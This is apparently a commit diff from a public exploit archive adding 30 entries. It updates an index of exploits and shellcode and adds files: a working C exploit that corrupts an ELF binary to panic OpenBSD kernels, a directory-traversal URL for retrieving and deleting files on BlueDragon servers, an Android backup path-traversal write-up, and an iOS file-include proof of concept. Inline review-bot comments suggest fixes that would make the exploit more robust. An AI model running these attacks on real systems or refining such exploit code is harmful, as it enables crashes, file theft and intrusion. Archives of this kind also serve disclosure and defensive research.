DB: 2015-04-22
30 new exploits
This commit is contained in:
parent
aaae73b6cb
commit
fffcb94afe
31 changed files with 3137 additions and 6 deletions
42
files.csv
|
@ -5823,7 +5823,7 @@ id,file,description,date,author,platform,type,port
|
|||
6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit",2008-08-06,james,php,webapps,0
|
||||
6215,platforms/php/webapps/6215.txt,"Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0
|
||||
6216,platforms/windows/dos/6216.html,"Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC",2008-08-10,"Guido Landi",windows,dos,0
|
||||
6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit",2008-08-10,LiquidWorm,windows,remote,0
|
||||
6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow Exploit",2008-08-10,LiquidWorm,windows,remote,0
|
||||
6218,platforms/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 Privilege Escalation Vulnerability PoC",2008-08-10,"Core Security",multiple,dos,0
|
||||
6219,platforms/php/webapps/6219.txt,"e107 <= 0.7.11 - Arbitrary Variable Overwriting Vulnerability",2008-08-10,"GulfTech Security",php,webapps,0
|
||||
6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BoF Exploit",2008-08-10,"Guido Landi",windows,remote,0
|
||||
|
@ -14782,7 +14782,7 @@ id,file,description,date,author,platform,type,port
|
|||
16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 - Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0
|
||||
16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 Persistent XSS Vulnerability",2011-03-16,"AutoSec Tools",php,webapps,0
|
||||
16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0
|
||||
16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
|
||||
16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
|
||||
16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injection Vulnerabilities",2011-03-17,"Aung Khant",php,webapps,0
|
||||
16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
|
||||
16995,platforms/php/webapps/16995.txt,"Joomla com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0
|
||||
|
@ -26455,6 +26455,7 @@ id,file,description,date,author,platform,type,port
|
|||
29443,platforms/windows/dos/29443.py,"VideoLan VLC Media Player 0.8.6a Unspecified Denial of Service Vulnerability",2007-01-11,shinnai,windows,dos,0
|
||||
29444,platforms/windows/dos/29444.pl,"CA BrightStor ARCserve Backup Message Engine/Tape Engine Remote Buffer Overflow Vulnerability",2007-01-11,"Tenable NS",windows,dos,0
|
||||
29445,platforms/windows/dos/29445.rb,"Hanso Player 2.5.0 - 'm3u' Buffer Overflow (DoS)",2013-11-05,"Necmettin COSKUN",windows,dos,0
|
||||
36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0
|
||||
29446,platforms/linux/local/29446.c,"Grsecurity Kernel PaX - Local Privilege Escalation Vulnerability",2006-12-18,anonymous,linux,local,0
|
||||
29447,platforms/windows/dos/29447.txt,"WinZip 9.0 Command Line Remote Buffer Overflow Vulnerability",2007-01-12,"Umesh Wanve",windows,dos,0
|
||||
29448,platforms/osx/remote/29448.txt,"Apple Mac OS X 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow Vulnerability",2007-01-12,LMH,osx,remote,0
|
||||
|
@ -32993,6 +32994,7 @@ id,file,description,date,author,platform,type,port
|
|||
36575,platforms/multiple/webapps/36575.py,"JBoss AS versions 3_ 4_ 5_ 6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0
|
||||
36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0
|
||||
36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0
|
||||
36739,platforms/osx/local/36739.m,"Apple MAC OS X < 10.9/10 - Local Root Exploit",2015-04-13,mu-b,osx,local,0
|
||||
36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,metasploit,windows,remote,0
|
||||
36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent XSS Vulnerability",2015-03-31,"Michael Hendrickx",windows,webapps,0
|
||||
36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80
|
||||
|
@ -33048,6 +33050,7 @@ id,file,description,date,author,platform,type,port
|
|||
36633,platforms/linux/dos/36633.txt,"Wireshark Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0
|
||||
36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities",2012-01-28,the_cyber_nuxbie,php,webapps,0
|
||||
36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
|
||||
36637,platforms/lin_x86/shellcode/36637.c,"Disable ASLR in Linux (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0
|
||||
36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component 'catid' Parameter Remote SQL Injection Vulnerability",2012-01-31,the_cyber_nuxbie,php,webapps,0
|
||||
36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component 'id' Parameter Remote SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
|
||||
36640,platforms/php/webapps/36640.txt,"WordPress Work The Flow File Upload 2.5.2 - Arbitrary File Upload Vulnerability",2015-04-05,"Claudio Viviani",php,webapps,0
|
||||
|
@ -33156,15 +33159,16 @@ id,file,description,date,author,platform,type,port
|
|||
36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80
|
||||
36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80
|
||||
36750,platforms/lin_x86-64/shellcode/36750.c,"linux/x86 setreuid(0_ 0) + execve(""/sbin/halt"") + exit(0) - 49 bytes",2015-04-14,"Febriyanto Nugroho",lin_x86-64,shellcode,0
|
||||
36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36756,platforms/windows/remote/36756.html,"Samsung iPOLiS ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
|
||||
36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 admin/base_useradmin.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 admin/index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
|
||||
36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php Crafted File Upload Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0
|
||||
36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80
|
||||
36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit (RCE)",2015-04-14,LiquidWorm,php,webapps,80
|
||||
36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 - Multiple CSRF XSS Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80
|
||||
36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 - CSRF Arbitrary File Creation Exploit (RCE)",2015-04-14,LiquidWorm,php,webapps,80
|
||||
36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 'target' Parameter HTML Injection Vulnerability",2012-02-13,sonyy,php,webapps,0
|
||||
36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 pfile/kommentar.php filecat Parameter XSS",2012-02-13,indoushka,php,webapps,0
|
||||
36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0
|
||||
|
@ -33175,8 +33179,15 @@ id,file,description,date,author,platform,type,port
|
|||
36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0
|
||||
36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability",2012-02-13,chippy1337,cgi,webapps,0
|
||||
36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0
|
||||
36774,platforms/php/webapps/36774.txt,"WordPress MiwoFTP Plugin 1.0.5 - Arbitrary File Download Exploit",2015-04-15,"Necmettin COSKUN",php,webapps,0
|
||||
36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80
|
||||
36776,platforms/windows/dos/36776.py,"MS Windows (HTTP.sys) HTTP Request Parsing DoS (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
|
||||
36777,platforms/php/webapps/36777.txt,"Wordpress Ajax Store Locator 1.2 SQL Injection Vulnerability",2015-04-16,"Claudio Viviani",php,webapps,80
|
||||
36777,platforms/php/webapps/36777.txt,"Wordpress Ajax Store Locator 1.2 - SQL Injection Vulnerability",2015-04-16,"Claudio Viviani",php,webapps,80
|
||||
36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 execve ""/bin/sh"" - shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0
|
||||
36779,platforms/win32/shellcode/36779.c,"win32/xp sp3 Create (""file.txt"") (83 bytes)",2015-04-17,"TUNISIAN CYBER",win32,shellcode,0
|
||||
36780,platforms/win32/shellcode/36780.c,"win32/xp sp3 - Restart computer",2015-04-17,"TUNISIAN CYBER",win32,shellcode,0
|
||||
36781,platforms/lin_x86/shellcode/36781.py,"Linux custom execve-shellcode Encoder/Decoder",2015-04-17,"Konstantinos Alexiou",lin_x86,shellcode,0
|
||||
36782,platforms/linux/local/36782.sh,"Apport - Local Linux Root",2015-04-17,"Ricardo F. Teixeira",linux,local,0
|
||||
36784,platforms/php/webapps/36784.txt,"11in1 CMS 1.2.1 - index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0
|
||||
36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - admin/index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0
|
||||
36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Admin Password Manipulation CSRF",2012-02-15,"High-Tech Bridge SA",php,webapps,0
|
||||
|
@ -33187,3 +33198,22 @@ id,file,description,date,author,platform,type,port
|
|||
36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection Vulnerabilities",2012-02-16,tempe_mendoan,php,webapps,0
|
||||
36792,platforms/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Parameter Local File Include Vulnerability",2012-02-17,"Ucha Gobejishvili",php,webapps,0
|
||||
36793,platforms/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Parameter Cross Site Scripting Vulnerability",2012-02-17,sonyy,php,webapps,0
|
||||
36795,platforms/ios/webapps/36795.txt,"Wifi Drive Pro 1.2 iOS - File Include Web Vulnerability",2015-04-21,Vulnerability-Lab,ios,webapps,0
|
||||
36796,platforms/ios/webapps/36796.txt,"Photo Manager Pro 4.4.0 iOS - File Include Vulnerability",2015-04-21,Vulnerability-Lab,ios,webapps,0
|
||||
36797,platforms/ios/webapps/36797.txt,"Mobile Drive HD 1.8 - File Include Web Vulnerability",2015-04-21,Vulnerability-Lab,ios,webapps,0
|
||||
36798,platforms/ios/webapps/36798.txt,"Photo Manager Pro 4.4.0 iOS - Code Execution Vulnerability",2015-04-21,Vulnerability-Lab,ios,webapps,0
|
||||
36799,platforms/bsd/local/36799.c,"OpenBSD <= 5.6 - Multiple Local Kernel Panics",2015-04-21,nitr0us,bsd,local,0
|
||||
36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 - SQL Injection Vulnerability",2015-04-21,"Claudio Viviani",php,webapps,0
|
||||
36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0
|
||||
36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
|
||||
36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
|
||||
36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0
|
||||
36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
|
||||
36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,metasploit,windows,remote,0
|
||||
36809,platforms/php/remote/36809.rb,"Wordpress Reflex Gallery Upload Vulnerability",2015-04-21,metasploit,php,remote,80
|
||||
36810,platforms/php/remote/36810.rb,"Wordpress N-Media Website Contact Form Upload Vulnerability",2015-04-21,metasploit,php,remote,80
|
||||
36811,platforms/php/remote/36811.rb,"Wordpress Creative Contact Form Upload Vulnerability",2015-04-21,metasploit,php,remote,80
|
||||
36812,platforms/php/remote/36812.rb,"Wordpress Work The Flow Upload Vulnerability",2015-04-21,metasploit,php,remote,80
|
||||
36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0
|
||||
36814,platforms/osx/dos/36814.c,"Mac OS X Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
|
||||
36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80
|
||||
|
|
|
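Review bot: Several new rows are placed out of id order: `36794` lands between 29445 and 29446, `36739` between 36577 and 36579, `36807` between 36774 and 36776, and `36750` after 36751. Any tooling that sorts, bisects or de-duplicates this index by id will misbehave on those rows; inserting each at its numeric position would keep the file consistent with the surrounding entries.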
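--- a/platforms/bsd/local/36799.c
+++ b/platforms/bsd/local/36799.c
@@ -0,0 +1,94 @@
+/*
+
+# Exploit Title: OpenBSD <= 5.6 - Multiple Local Kernel Panics
+# Exploit Author: nitr0us
+# Vendor Homepage: http://www.openbsd.org
+# Version: 5.6
+# Tested on: OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014), OpenBSD 5.6 i386, OpenBSD 5.5 i386
+
+* - 0xb16b00b5.c
+*
+* - Alejandro Hernandez (@nitr0usmx)
+* - Mexico 2015
+*
+* #########################################################################
+* # OpenBSD <= 5.6 kernel panic()'s in sys/uvm/uvm_map.c #
+* #########################################################################
+*
+* Tested under:
+* - OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014)
+* - OpenBSD 5.6 i386
+* - OpenBSD 5.5 i386
+*
+* https://www.youtube.com/watch?feature=player_detailpage&v=PReopSQZOrY#t=20
+*
+*/
+
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <sys/param.h>
+#include <sys/types.h>
+
+#ifndef __OpenBSD__
+#error "Not OpenBSD !!!1111";
+#else
+#include <sys/exec_elf.h>
+#endif
+
+#ifndef __i386__
+#error "Not i386 !!!1111";
+#endif
+
+char big_b00bz[] =
+" 8M:::::::8888M:::::888:::::::88:::8888888::::::::Mm\n"
+" 88MM:::::8888M:::::::88::::::::8:::::888888:::M:::::M\n"
+" 8888M:::::888MM::::::::8:::::::::::M::::8888::::M::::M\n"
+" 88888M:::::88:M::::::::::8:::::::::::M:::8888::::::M::M\n"
+" 88 888MM:::888:M:::::::::::::::::::::::M:8888:::::::::M:\n"
+" 8 88888M:::88::M:::::::::::::::::::::::MM:88::::::::::::M\n"
+" 88888M:::88::M::::::::::*88*::::::::::M:88::::::::::::::M\n"
+" 888888M:::88::M:::::::::88@@88:::::::::M::88::::::::::::::M\n"
+" 888888MM::88::MM::::::::88@@88:::::::::M:::8::::::::::::::*8\n"
+" 88888 M:::8::MM:::::::::*88*::::::::::M:::::::::::::::::88@@\n"
+" 8888 MM::::::MM:::::::::::::::::::::MM:::::::::::::::::88@@\n"
+" 888 M:::::::MM:::::::::::::::::::MM::M::::::::::::::::*8\n"
+" 888 MM:::::::MMM::::::::::::::::MM:::MM:::::::::::::::M\n"
+" 88 M::::::::MMMM:::::::::::MMMM:::::MM::::::::::::MM\n"
+" 88 MM:::::::::MMMMMMMMMMMMMMM::::::::MMM::::::::MMM\n"
+" 88 MM::::::::::::MMMMMMM::::::::::::::MMMMMMMMMM\n"
+" 88 8MM::::::::::::::::::::::::::::::::::MMMMMM\n"
+" 8 88MM::::::::::::::::::::::M:::M::::::::MM\n"
+" 888MM::::::::::::::::::MM::::::MM::::::M";
+
+int main(int argc, char **argv)
+{
+Elf32_Ehdr *hdr;
+Elf32_Phdr *pht;
+struct stat statinfo;
+char *elfptr;
+int fd;
+
+if(argc != 2) return printf("Usage: %s <elf_exec>\n", argv[0]);
+fd = open(argv[1], O_RDWR);
+fstat(fd, &statinfo);
+elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+hdr = (Elf32_Ehdr *) (elfptr);
+pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);
+printf("%s", big_b00bz);
+pht[9].p_type = 0x7defaced; // <--- these overwrites ------------v
+pht[2].p_filesz = (arc4random() % 2) ? 0x41414141 : 0x43434343; // are necessary
+sleep(3 + (arc4random() % 3));
+if(arc4random() % 3 == 2) puts(" .. I like b1g 0nez !!"); // 33.33% chance
+else { if(arc4random() % 2){ puts(" .. want s0me ?!"); pht[5].p_vaddr = 0xb16b00b5; } // .6666 * .5 = 33.33% chance
+else { puts(" .. j00 like it ?!"); pht[5].p_vaddr = 0x0ace55e8; }} // .6666 * .5 = 33.33% chance
+msync(elfptr, 0, MS_ASYNC);
+munmap(elfptr, statinfo.st_size);
+close(fd);
+sleep(3 + (arc4random() % 3));
+system(argv[1]); // ( o )( o ) panic()
+puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n");
+return 0xDEFECA7E;
+}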
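Review bot: The results of open(), fstat() and mmap() are never checked before `hdr->e_phoff` is read, so a missing or unreadable path crashes with SIGSEGV instead of a diagnostic; `if (fd < 0 || fstat(fd, &statinfo) < 0) { perror(argv[1]); return 1; }` after the open and `if (elfptr == MAP_FAILED) { perror("mmap"); return 1; }` after the mmap would make the failure explicit. The `pht[9]`, `pht[2]` and `pht[5]` writes are likewise done without comparing the index against `hdr->e_phnum`, so a binary with fewer program headers gets stray writes past its header table. `system()` and `arc4random()` are called without `#include <stdlib.h>`, which leaves them implicitly declared, and `msync(elfptr, 0, MS_ASYNC)` passes a zero length where `statinfo.st_size` was mapped. A header comment such as `/* NOTE: the target ELF is rewritten in place through MAP_SHARED; keep a copy */` would warn users that the supplied binary is permanently altered.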
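--- a/platforms/cfm/webapps/36815.txt
+++ b/platforms/cfm/webapps/36815.txt
@@ -0,0 +1,29 @@
+Vulnerability title: Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet
+CVE: CVE-2014-5370
+Vendor: New Atlanta
+Product: BlueDragon CFChart Servlet
+Affected version: 7.1.1.17759
+Fixed version: 7.1.1.18527
+Reported by: Mike Westmacott
+Details:
+
+The CFChart servlet of BlueDragon (component com.naryx.tagfusion.cfm.cfchartServlet) is vulnerable to arbitrary file retrieval due to a directory traversal vulnerability. In certain circumstances the retrieved file is also deleted.
+
+Exploit:
+
+In order to retrieve a file from a vulnerable server use the following URL in a web browser and intercept the response from the server:
+
+
+http://TARGETHOST/cfchart.cfchart?..\..\..\..\..\..\..\..\..\..\TARGETFILE
+
+The browser will display a broken image, however the HTTP response will contain the file’s contents.
+
+Further details at:
+
+https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5370/
+
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+
+Disclaimer:
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.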
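--- a/platforms/hardware/local/36813.txt
+++ b/platforms/hardware/local/36813.txt
@@ -0,0 +1,54 @@
+ADB backup archive path traversal file overwrite
+------------------------------------------------
+
+Using adb one can create a backup of his/her Android device and store it
+on the PC. The backup archive is based on the tar file format.
+
+By modifying tar headers to contain ../../ like patterns it is possible
+to overwrite files owned by the system user on writeable partitions.
+
+
+An example pathname in the tar header:
+apps/com.android.settings/sp/../../../../data/system/evil.txt
+Tar header checksum must be corrected of course.
+
+When restoring the modified archive the BackupManagerService overwrites
+the resolved file name, since file name is not sanitized.
+
+Bugfix in the version control:
+https://android.googlesource.com/platform/frameworks/base/+/7bc601d%5E!/#F0
+
+
+Android 5 (Lollipop) and newer versions are not affected (due to the
+official bugfix linked above).
+
+
+Additional conditions for exploiting on pre-Lollipop systems:
+
+- Partition of the desination file must be mounted as writeable (eg.
+/system won't work, but /data does)
+
+- It is not possible to overwrite files owned by root, since the process
+doing the restore is running as the same user as the package itself and
+Android packages cannot run.
+
+- It is not possible to overwrite files owned by system user since AOSP
+4.3 due to Id6a0cb4c113c2e4a8c4605252cffa41bea22d8a3, a new hardening
+was introduced "... ignoring non-agent system package ".
+(If the operating system is custom and there is a system package
+available with a full backup agent specified explicitly, then that
+custom Android 4.3 and 4.4 might be affected too.)
+
+Pre 4.3 AOSP systems are affected without further conditions: it is
+possible to overwrite files owned by the system user or any other
+packages installed on the system.
+
+
+
+Tested on: Android 4.0.4:
+Reported on: 2014-07-14
+Assigned CVE: CVE-2014-7951
+Android bug id: 16298491
+Discovered by: Imre Rad / Search-Lab Ltd.
+http://www.search-lab.hu
+http://www.securecodingacademy.com/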
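--- a/platforms/ios/webapps/36795.txt
+++ b/platforms/ios/webapps/36795.txt
@@ -0,0 +1,185 @@
+Document Title:
+===============
+Wifi Drive Pro v1.2 iOS - File Include Web Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1447
+
+
+Release Date:
+=============
+2015-03-13
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1447
+
+
+Common Vulnerability Scoring System:
+====================================
+6.3
+
+
+Product & Service Introduction:
+===============================
+This app lets you use your iphone, iPad or iPod Touch as a wireless USB drive through which you can download, save and view documents and files.
+Using the app you can transfer files from your PC or Mac either wirelessly or through a USB port and carry your files wherever you go.
+
+(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/wifi-drive-pro/id579582610 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official Wifi Drive Pro v1.2 iOS mobile application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-03-13: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Mindspeak Software
+Product: Wifi Drive Pro - iOS Mobile Web Application 1.2
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official Mindspeak Software - Wifi Drive Pro v1.2 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
+to compromise the mobile web-application.
+
+The web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject own files with malicious
+`filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
+the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface`
+in connection with the vulnerable file upload POST method request.
+
+Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious
+attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
+
+The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
+of the local file include web vulnerability results in mobile application compromise or connected device component compromise.
+
+Request Method(s):
+[+] [POST]
+
+Vulnerable Module(s):
+[+] File Upload
+
+Vulnerable Parameter(s):
+[+] filename
+
+Affected Module(s):
+[+] Index File Dir Listing (http://localhost:49276/)
+
+
+Proof of Concept (PoC):
+=======================
+The local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+PoC: GET
+http://localhost:49276//%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png
+
+
+PoC: Vulnerable Source
+<p><a href="..">..</a><br>
+<a href="68-2.png">68-2.png</a> ( 24.3 Kb, 2015-03-09 14:57:29 +0000)<br>
+<a href="/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"></%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a> ( 0.5 Kb, 2015-03-09 14:57:48 +0000)<br />
+</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label>
+<label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></a></p>
+
+
+--- PoC Session Logs [POST] (Inject)---
+Status: 200[OK]
+POST http://localhost:49276/
+Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[846] Mime Type[application/x-unknown-content-type]
+Request Header:
+Host[localhost:49276]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Referer[http://localhost:49276/]
+Connection[keep-alive]
+POST-Daten:
+POST_DATA[-----------------------------28140821932238
+Content-Disposition: form-data; name="file"; filename="%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"
+Content-Type: image/png
+
+
+Reference(s):
+http://localhost:49276/
+http://localhost:49276//%3C./
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and
+disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks.
+Encode the output in the file dir index list with the vulnerable name value to prevent an application-side injection attacks.
+
+
+Security Risk:
+==============
+The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.3)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
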